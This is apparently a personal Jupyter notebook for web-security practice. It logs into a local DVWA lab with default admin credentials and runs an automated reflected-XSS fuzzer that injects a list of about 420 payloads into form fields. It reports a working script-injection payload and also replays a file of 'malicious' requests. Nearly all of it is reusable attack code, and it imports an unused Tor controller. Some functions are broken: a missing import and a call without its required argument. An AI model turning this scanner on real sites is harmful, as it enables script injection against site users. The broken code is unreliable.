https://docs.python-requests.org/en/master/user/advanced/  
https://realpython.com/python-requests/

In [1]:
import re
import requests
from requests_html import HTMLSession
from bs4 import BeautifulSoup

try:
    import urlparse
    from urllib import urlencode
except: # For Python 3
    import urllib
    from urllib.parse import urlparse, urlunparse, urljoin, urlencode, parse_qsl

import colorama
import random
from stem.control import Controller
from stem import Signal
import sys

In [34]:
def MyReadFile(path, encoding=None):
    file = open( path, 'r', encoding=encoding)
    filecontent = file.readlines()
    file.close() 
    return filecontent

In [ ]:
def MyWriteFile(path, filecontent, encoding=None):
    file = open( path, 'w', encoding=encoding)
    file.writelines( filecontent )
    file.close()

In [2]:
# https://stackoverflow.com/questions/2506379/add-params-to-given-url-in-python
def add_url_params(url, params={}):
    url_parts = list(urlparse(url))
    query = dict(parse_qsl(url_parts[4]))  # query = url_parts.query
    query.update(params)
    url_parts[4] = urlencode(query)
    return urlunparse(url_parts)

In [3]:
def login(session, loginURL, payload):
    r = session.get( loginURL )
    signin = BeautifulSoup( r.content , "html5lib")
    
    try:
        payload['user_token'] = signin.find('input', attrs={"name" : "user_token"} )['value']
    except:
        pass

    p = session.post( loginURL, data=payload )

In [4]:
def login_dvwa(loginURL):
    r = requests.get( loginURL )
    print(r.headers)
    
    session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
    session_id = session_id.group(1)
    print("[X] Session_id: " + session_id)
    
    cookie = {"PHPSESSID": session_id}
    
    signin = BeautifulSoup( r.text, "html.parser")
    
    user_token = signin.find("input", {"name": "user_token"})["value"]
    print("[X] User_token: " + user_token + "\n")
    
    payload = {"username": "admin",
               "password": "password",
               "Login": "Login",
               "user_token": user_token}
    
    req_login = requests.post(loginURL, payload, cookies=cookie,allow_redirects=False)
    
    print(req_login)
    
    result = req_login.headers["Location"]
    
    if "index.php" in result:
        return session_id
    else:
        print("Failed.")
        return

In [5]:
def send_request(url, payload, method, sessid):
    if sessid == '':
        sessid = login_dvwa()

    s = requests.Session()
    
    cookie = {
        "PHPSESSID": sessid,
        "security": "low"
    }
    
    if method == "GET":
        res = s.get(url, params=payload, cookies=cookie, allow_redirects=False)
    elif method == "POST":
        res = s.post(url, data=payload, cookies=cookie, allow_redirects=False)
    
    print(res.status_code)

In [6]:
# https://github.com/chrisandoryan/Nethive-Project/blob/master/utils.py
def replay_xss_payload_dataset(target):
    print("Replaying XSS Payload dataset from https://github.com/pgaijin66/XSS-Payloads/blob/master/payload.txt")

    param_name = 'name'

    payloads = open('/home/MaliciousFormattedPayload.log', 'r', encoding="ISO-8859-1").readlines()

    send_count = 0
    
    sessid = login_dvwa()
    for data in payloads:
        x = data.split('#', 1)
        idx = x[0]
        payload = x[1]
        print(x)
        send_request(target, {param_name: payload, 'index': idx, 'Submit': 'Submit'}, "GET", sessid)
        send_count += 1
        time.sleep(1)
    
    print("Sent %d MALICIOUS requests." % send_count)

In [7]:
loginURL = "http://127.0.0.1/login.php"
protectedURL = "http://127.0.0.1/vulnerabilities/xss_r/"

In [8]:
s = requests.Session()
# s.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36"

In [9]:
# Fill in your details here to be posted to the login form.
payload = {
    'username': 'admin',
    'password': 'password',
    'Login': 'Login'
}

login( s, loginURL, payload )

In [10]:
# An authorised request.
r = s.get( protectedURL )
html_doc = r.content

In [11]:
soup = BeautifulSoup( html_doc , "html5lib")

In [12]:
# soup.prettify

In [13]:
forms = soup.find_all('form')

In [47]:
XSSpayloads = MyReadFile( 'XSSpayload.txt', "ISO-8859-1" )

print( f"len file = {len(XSSpayloads)}" )
XSSpayloads = list(set( [ x[:-1] for x in XSSpayloads if x != '\n'] ))
print( f"len file = {len(XSSpayloads)}" )

len file = 525
len file = 420


In [53]:
for i, form in enumerate(forms): 
    print(f"----- form {i} -----")
    formMethod = form.get('method')   # post / GET
    formAction = form.get('action')   # login.php
    formInputs = form.find_all('input')
    
    print(f"method = {formMethod}")
    print(f"action = {formAction}")
    
    href = urljoin(protectedURL, formAction ) 
    params={}
    
    for j, formInput in enumerate(formInputs):
        inputType = formInput.get('type') 
        inputName = formInput.get('name')
        inputValue = formInput.get('value')
        
        if(inputType == "submit"):
            continue
        
        params[inputName] = inputValue
        
        print(f"\t({j}) {inputName} = {inputValue} & inputType = {inputType}")
    
    for key, value in params.items():
        if( value == None ):
            print(key)
            
            for data in XSSpayloads:
                if(data=='\n'):
                    continue
                params[key] = data[:-1]
                
                new_URL = add_url_params(href, params)

                r_tmp = s.get( new_URL )
                html_doc_tmp = r_tmp.text

                if( data[:-1] in html_doc_tmp ):
                    print( f"\t{key}={data[:-1]},\n\t\t{new_URL}" )
                    break
                
            

----- form 0 -----
method = GET
action = #
	(0) name = None & inputType = text
name
	name=<svg><script ?>alert(1,
		http://127.0.0.1/vulnerabilities/xss_r/?name=%3Csvg%3E%3Cscript+%3F%3Ealert%281


In [ ]:
s.close()